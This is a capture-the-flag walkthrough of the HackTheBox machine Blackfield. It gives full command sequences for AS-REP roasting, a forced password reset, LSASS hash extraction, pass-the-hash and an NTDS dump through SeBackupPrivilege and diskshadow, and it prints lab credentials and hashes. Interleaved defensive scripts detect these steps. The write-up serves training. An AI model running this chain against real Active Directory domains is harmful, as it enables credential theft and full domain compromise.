SecWalk.com

HTB Walkthrough Blackfield 10.10.10.192

Box Summary:

Blackfield was released on 6 June 2020 and is rated Hard.

From the nmap scan we can assume we are dealing with an Active Directory machine. After some enumeration we can connect to SMB anonymously; the profiles$ share contains a lot of usernames, and a few stand out because they do not start with a capital letter. Further enumeration shows that we can try an AS-REP roasting attack against those usernames. Once we have user credentials some logical thinking is needed: what can we do with this user? It turns out we can change another user's password. That gives us access to another share where sensitive files are located, and after downloading them we are able to get a hash for svc_backup and read the user flag. For privilege escalation, svc_backup has SeBackupPrivilege enabled, and after some research we can exploit that to get Administrator privileges.

Enumeration

Nmap scan

nmap -sV -sC --top-ports=6000 10.10.10.192

This shows it’s an Active Directory machine.

SMB Shares Enumeration
Because SMB is enabled, I wanted to check for SMB shares.
smbclient -L 10.10.10.192

Only one share is accessible anonymously: profiles$
smbclient //10.10.10.192/profiles$

The files themselves contained nothing useful, but the profile directory names are usernames, which gives us a list to work with later.


Rpcclient


Also, anonymous login with RPC failed.
rpcclient 10.10.10.192

Exploitation

After enumerating the running services, I determined that none of them could be used for further enumeration. Because this is an Active Directory machine, I looked for common Active Directory attack vectors.

Resource: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Because this is a domain, we can test the usernames we collected: if Kerberos pre-authentication is not required for any of them, the KDC will return an AS-REP for that account without a password, and we can crack its encrypted part offline.

GetNPUsers.py

Contents of usernames.txt

python GetNPUsers.py blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash

Cracking the intercepted hash

john --wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash

Cracked password: #00^BlackKnight

The credentials are:
support: #00^BlackKnight
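The attack above only works against accounts whose userAccountControl carries the DONT_REQ_PREAUTH flag (0x400000). The following script is an added example, not code from the SecWalk post: it parses a constructed LDIF-style export of the shape ldapsearch prints, decodes the flag bits, reports enabled accounts that would answer an AS-REP request without pre-authentication, and shows the corrected flag value. The DNs and flag values are made up for the example.

```python
import re

# Selected userAccountControl bits (values from Microsoft's ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000

# Constructed LDIF-style export; the DNs, names and values are made up for this
# example and are not taken from the box.
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=blackfield,DC=local
sAMAccountName: support
userAccountControl: 4194816

dn: CN=audit2020,CN=Users,DC=blackfield,DC=local
sAMAccountName: audit2020
userAccountControl: 512

dn: CN=svc_backup,CN=Users,DC=blackfield,DC=local
sAMAccountName: svc_backup
userAccountControl: 66048

dn: CN=old_app,CN=Users,DC=blackfield,DC=local
sAMAccountName: old_app
userAccountControl: 4194818
"""

ATTR_RE = re.compile(r"^(?P<attr>[A-Za-z]+): (?P<value>.*)$")


def parse_ldif(text):
    """Turn an LDIF export into a list of {sAMAccountName, userAccountControl} dicts."""
    users = []
    for block in re.split(r"\n\s*\n", text.strip()):
        record = {}
        for line in block.splitlines():
            m = ATTR_RE.match(line)
            if m:
                record[m.group("attr")] = m.group("value")
        if "sAMAccountName" in record and "userAccountControl" in record:
            users.append({
                "sAMAccountName": record["sAMAccountName"],
                "userAccountControl": int(record["userAccountControl"]),
            })
    return users


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(users):
    """Enabled accounts with DONT_REQ_PREAUTH set: the KDC answers their AS-REQ without pre-auth."""
    return [
        u["sAMAccountName"] for u in users
        if u["userAccountControl"] & DONT_REQ_PREAUTH
        and not u["userAccountControl"] & ACCOUNTDISABLE
    ]


def hardened_uac(value):
    """The userAccountControl value with the pre-auth exemption cleared (the fix)."""
    return value & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    users = parse_ldif(SAMPLE_LDIF)
    for u in users:
        print(f"{u['sAMAccountName']:<12} {decode_uac(u['userAccountControl'])}")
    print("AS-REP roastable (enabled, no pre-auth):", asrep_roastable(users))
```

Disabled accounts are skipped because the KDC refuses them anyway; in the sample only support is reported, and clearing the bit (512 instead of 4194816) removes it from the list.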


RPCclient


I couldn't access any SMB share with these credentials, but I was able to log in with rpcclient.
rpcclient -U support 10.10.10.192

First, I enumerated for more users.
enumdomusers

In rpcclient there is a command called setuserinfo2, which lets us set a user's password (information level 23 carries the new password).


The only user for whom I could do this successfully was audit2020:

setuserinfo2 audit2020 23 IceL0rd
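Both steps so far leave traces in the domain controller's Security log: the AS-REP request without pre-authentication is logged as event 4768 with Pre-Authentication Type 0, and the setuserinfo2 call is logged as event 4724 (an attempt was made to reset an account's password) with the calling account as subject. The following detection logic is an added example, not part of the SecWalk post; it runs over constructed JSON-lines records whose field names follow the Windows event XML, and the approved set of password resetters is an assumption for the example.

```python
import json

# Assumption for the example: accounts that are allowed to reset other users' passwords.
ALLOWED_PASSWORD_RESETTERS = {"helpdesk", "Administrator"}

# Constructed Security-log records (JSON lines). Field names follow the event XML
# for 4768 and 4724; the values are made up for this example.
SAMPLE_EVENTS = """\
{"EventID": 4768, "TargetUserName": "support", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "audit2020", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.20", "Status": "0x0"}
{"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020", "TargetDomainName": "BLACKFIELD"}
{"EventID": 4724, "SubjectUserName": "helpdesk", "TargetUserName": "jdoe", "TargetDomainName": "BLACKFIELD"}
"""


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Apply two rules to the event stream and return a list of alert dicts."""
    alerts = []
    for e in events:
        if e.get("EventID") == 4768:
            # PreAuthType 0 = logon without pre-authentication. A successful TGT
            # request of this kind hands out an AS-REP whose encrypted part can be
            # cracked offline, which is exactly what GetNPUsers.py collects.
            if e.get("PreAuthType") == "0" and e.get("Status") == "0x0":
                alerts.append({
                    "rule": "ASREP_WITHOUT_PREAUTH",
                    "account": e["TargetUserName"],
                    "source": e.get("IpAddress"),
                    # 0x17 is RC4-HMAC, the cheapest encryption type to crack.
                    "rc4": e.get("TicketEncryptionType") == "0x17",
                })
        elif e.get("EventID") == 4724:
            # A password reset carried out by an account outside the approved set.
            if e.get("SubjectUserName") not in ALLOWED_PASSWORD_RESETTERS:
                alerts.append({
                    "rule": "UNEXPECTED_PASSWORD_RESET",
                    "account": e["TargetUserName"],
                    "by": e["SubjectUserName"],
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

On the sample stream the first rule fires for support (RC4 AS-REP, no pre-auth) and the second for the reset of audit2020 performed by support; the helpdesk reset and the normal AS-REQ from audit2020 pass silently.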

Now that we have updated the audit2020 password, we can check whether this user has access to an SMB share.


Access SMB share with updated password


Connecting to the forensic share:
smbclient -U 'blackfield\audit2020' //10.10.10.192/forensic

After some enumeration of the share, I found an interesting file that may contain credential material: lsass.zip in memory_analysis, a memory dump of the LSASS process.

Download lsass.zip:

smbget smb://10.10.10.192/forensic/memory_analysis/lsass.zip -U audit2020

I used pypykatz to parse the LSASS minidump and extract the hashes:
pypykatz lsa minidump lsass.DMP


Reading through the output gives the NT hash of svc_backup:
svc_backup:9658d1d1dcd9250115e2205d9f48400d

Pass the hash svc_backup


Because port 5985 is open we can use evil-winrm to login with the hash.


evil-winrm -i blackfield -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'

Post-Exploitation
By listing the privileges of our token, we can see that SeBackupPrivilege is enabled.


Checking Token Privileges
Resource: https://github.com/giuliano108/SeBackupPrivilege

Note: This Github page is owned by giuliano108. Secwalk won’t/can’t be responsible for any damage or the content.


whoami /priv
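The same listing is useful from the other side: an auditor reviewing service accounts wants to know which of the privileges a token holds bypass the normal access checks. The script below is an added example, not from the SecWalk post. It parses a constructed sample of `whoami /priv` output (the layout matches the real command, the privilege set is invented) and reports the high-risk privileges with the reason each one matters; the risk table is the author's selection for this example.

```python
import re

# Privileges that let the holder bypass or rewrite normal access checks, with the
# reason each one matters to a defender. Selection made for this example.
HIGH_RISK_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (backup semantics)",
    "SeRestorePrivilege": "write any file regardless of its ACL (restore semantics)",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate tokens of clients that connect to the process",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeManageVolumePrivilege": "perform volume maintenance tasks",
}

# Constructed sample of `whoami /priv` output; same layout as the real command,
# privilege set invented for this example.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# One table row: privilege name, free-text description, state.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege: state} from the table printed by `whoami /priv`."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def high_risk(privs, include_disabled=False):
    """High-risk privileges held by the token, with the reason each one matters.

    A 'Disabled' privilege is still held by the token and can be switched on by
    the process itself (AdjustTokenPrivileges), so include_disabled=True gives
    the full exposure; the default reports only the ones currently enabled.
    """
    return [
        (name, state, HIGH_RISK_PRIVILEGES[name])
        for name, state in privs.items()
        if name in HIGH_RISK_PRIVILEGES and (include_disabled or state == "Enabled")
    ]


if __name__ == "__main__":
    for name, state, why in high_risk(parse_whoami_priv(SAMPLE_WHOAMI_PRIV), include_disabled=True):
        print(f"{name:<32} {state:<9} {why}")
```

On the sample the report lists SeBackupPrivilege and SeRestorePrivilege; SeShutdownPrivilege and the others are parsed but not reported because they do not affect access control.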


Exploiting the SeBackupPrivilege token


First, we need to download the two DLLs (see the resource above) and upload them to the target system.

upload /tmp/Blackfield/exploitation/SeBackupPrivilegeUtils.dll
upload /tmp/Blackfield/exploitation/SeBackupPrivilegeCmdLets.dll

Now we import the two DLLs and enable the privilege.


Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege

But even with the privilege enabled, we cannot simply copy the root flag and read it.

Changing File Permissions NTDS


What we can do is change the permissions on C:\windows\ntds, the folder holding ntds.dit (the Active Directory database, which contains the Administrator hash).


$user = "blackfield.local\svc_backup"
$folder = "C:\windows\ntds"
$acl = Get-Acl $folder
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule $user, "FullControl", "ContainerInherit,ObjectInherit", "None", "Allow"
$acl.AddAccessRule($rule)
Set-Acl -Path $folder -AclObject $acl
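An explicit FullControl grant to a service account on the NTDS folder is exactly the kind of drift a periodic ACL baseline check should catch. The script below is an added example, not from the SecWalk post: it parses a constructed icacls-style listing of the folder (same layout as the real command; the entries are made up), compares the trustees against an assumed baseline of SYSTEM and Administrators, and reports every other ACE together with what makes it dangerous.

```python
import re

# Assumption for the example: trustees expected to hold an ACE on the NTDS folder.
EXPECTED_TRUSTEES = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators"}

# Constructed sample in the layout icacls prints. The svc_backup entry is the kind
# of explicit (non-inherited) FullControl grant a Set-Acl call like the one above
# produces. The listing is made up for this example.
SAMPLE_ICACLS = r"""C:\Windows\NTDS NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                blackfield.local\svc_backup:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# trustee:(flag)(flag)(rights) ; trustees may contain spaces, so match non-greedily.
ACE_RE = re.compile(r"^(?P<trustee>.+?):(?P<rights>(?:\([^)]*\))+)$")
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific rights that allow changing the data or its security descriptor.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "WDAC", "WO"}


def parse_icacls(text):
    """Return (path, [ {trustee, flags, rights} ]) from one icacls listing."""
    lines = [l for l in text.splitlines() if l.strip()]
    path, first_ace = lines[0].split(" ", 1)  # assumption: the path contains no spaces
    aces = []
    # Continuation ACEs are indented; the summary line is not, so it is skipped.
    for raw in [first_ace] + [l for l in lines[1:] if l[0].isspace()]:
        m = ACE_RE.match(raw.strip())
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("rights"))
        flags = {t for t in tokens if t in INHERIT_FLAGS}
        rights = set()
        for t in tokens:
            if t not in flags:
                rights.update(t.split(","))  # specific rights come as (RX,W)
        aces.append({"trustee": m.group("trustee"), "flags": flags, "rights": rights})
    return path, aces


def unexpected_grants(aces, expected=EXPECTED_TRUSTEES):
    """ACEs for trustees outside the baseline, each with the reasons it is risky."""
    findings = []
    for ace in aces:
        if ace["trustee"] in expected:
            continue
        reasons = []
        writable = ace["rights"] & WRITE_RIGHTS
        if writable:
            reasons.append("write-capable rights " + ",".join(sorted(writable)))
        if "I" not in ace["flags"]:
            reasons.append("explicit (not inherited) ACE")
        findings.append((ace["trustee"], reasons))
    return findings


if __name__ == "__main__":
    path, aces = parse_icacls(SAMPLE_ICACLS)
    for trustee, reasons in unexpected_grants(aces):
        print(f"{path}: {trustee}: " + "; ".join(reasons))
```

Only the svc_backup entry is reported on the sample, flagged both for FullControl and for being an explicit ACE rather than one inherited from C:\Windows.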


Creating ShadowCopy

In order to create a shadow copy, we run diskshadow with the following script. Note the extra trailing character on every line: diskshadow drops the last character of each script line when reading the file, which is why the alias is declared as mydrives but referenced as %mydrive%.


set metadata C:\temp\backup.cab
set context clientaccessibles
set context persistents
begin backups
add volume c: alias mydrives
creates
expose %mydrive% z:s

Upload the script to the target system and run it:
upload /tmp/Blackfield/exploitation/scipt.txt

Diskshadow /s scipt.txt

If we look in our directories now, we see the two files we need in order to dump the hashes: ntds.dit from the shadow copy and the SYSTEM registry hive (saved as SYSTEM.bak). Download both.

Now we have the two files we needed on the Kali system.

Now we can use secretsdump.py to dump the hashes offline.


python secretsdump.py -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash

head -n 5 admin_hash.ntds

Pass the hash Administrator

evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
